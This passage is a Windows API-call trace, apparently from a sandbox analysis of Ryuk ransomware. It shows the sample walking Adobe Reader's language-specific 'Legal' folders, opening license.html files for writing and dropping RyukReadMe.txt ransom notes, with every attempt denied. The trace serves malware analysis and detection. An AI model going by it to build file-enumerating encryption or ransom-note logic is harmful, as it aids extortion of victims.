hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.380] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.380] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\license.html", dwFileAttributes=0x80) returned 0 [0138.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.380] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.380] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.380] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.380] SetLastError (dwErrCode=0x0) [0138.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.380] GetLastError () returned 0x5 [0138.381] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.381] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.381] SetLastError (dwErrCode=0x0) [0138.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.381] GetLastError () returned 0x5 [0138.381] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.381] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.381] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.381] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.382] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.382] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.382] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\license.html", dwFileAttributes=0x80) returned 0 [0138.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.382] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.382] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.382] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.382] SetLastError (dwErrCode=0x0) [0138.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.382] GetLastError () returned 0x5 [0138.382] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.382] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.382] SetLastError (dwErrCode=0x0) [0138.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.383] GetLastError () returned 0x5 [0138.383] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.383] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.383] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.383] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.383] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.383] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.384] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\license.html", dwFileAttributes=0x80) returned 0 [0138.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.384] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.384] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.384] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.384] SetLastError (dwErrCode=0x0) [0138.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.384] GetLastError () returned 0x5 [0138.384] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.384] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.384] SetLastError (dwErrCode=0x0) [0138.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.384] GetLastError () returned 0x5 [0138.384] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.384] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.385] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.385] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.385] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.385] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.385] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\license.html", dwFileAttributes=0x80) returned 0 [0138.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.385] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.385] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.385] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.385] SetLastError (dwErrCode=0x0) [0138.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.385] GetLastError () returned 0x5 [0138.386] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.386] SetLastError (dwErrCode=0x0) [0138.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.386] GetLastError () returned 0x5 [0138.386] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.386] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.388] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.388] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.388] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.388] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\license.html", dwFileAttributes=0x80) returned 0 [0138.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.388] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.388] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.388] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.388] SetLastError (dwErrCode=0x0) [0138.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.388] GetLastError () returned 0x5 [0138.388] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.389] SetLastError (dwErrCode=0x0) [0138.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.389] GetLastError () returned 0x5 [0138.389] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.389] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.389] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.389] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.389] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.389] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\license.html", dwFileAttributes=0x80) returned 0 [0138.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.389] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.390] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.390] SetLastError (dwErrCode=0x0) [0138.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.390] GetLastError () returned 0x5 [0138.390] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.390] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.390] SetLastError (dwErrCode=0x0) [0138.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.390] GetLastError () returned 0x5 [0138.390] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.390] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.390] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.390] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.390] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.390] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.390] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html", dwFileAttributes=0x80) returned 0 [0138.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.391] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.391] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.391] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.391] SetLastError (dwErrCode=0x0) [0138.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.391] GetLastError () returned 0x5 [0138.391] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.391] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.391] SetLastError (dwErrCode=0x0) [0138.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.391] GetLastError () returned 0x5 [0138.391] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.391] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.391] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.392] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.392] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.392] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.392] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html", dwFileAttributes=0x80) returned 0 [0138.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.393] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.393] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.393] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.393] SetLastError (dwErrCode=0x0) [0138.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.393] GetLastError () returned 0x5 [0138.393] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.393] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.393] SetLastError (dwErrCode=0x0) [0138.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.393] GetLastError () returned 0x5 [0138.393] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.393] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.393] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.394] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.394] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.394] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.394] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html", dwFileAttributes=0x80) returned 0 [0138.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.394] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.395] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.395] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.395] SetLastError (dwErrCode=0x0) [0138.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.395] GetLastError () returned 0x5 [0138.395] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.395] SetLastError (dwErrCode=0x0) [0138.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.395] GetLastError () returned 0x5 [0138.395] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.395] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.396] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.396] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.396] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html", dwFileAttributes=0x80) returned 0 [0138.396] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.396] CloseHandle 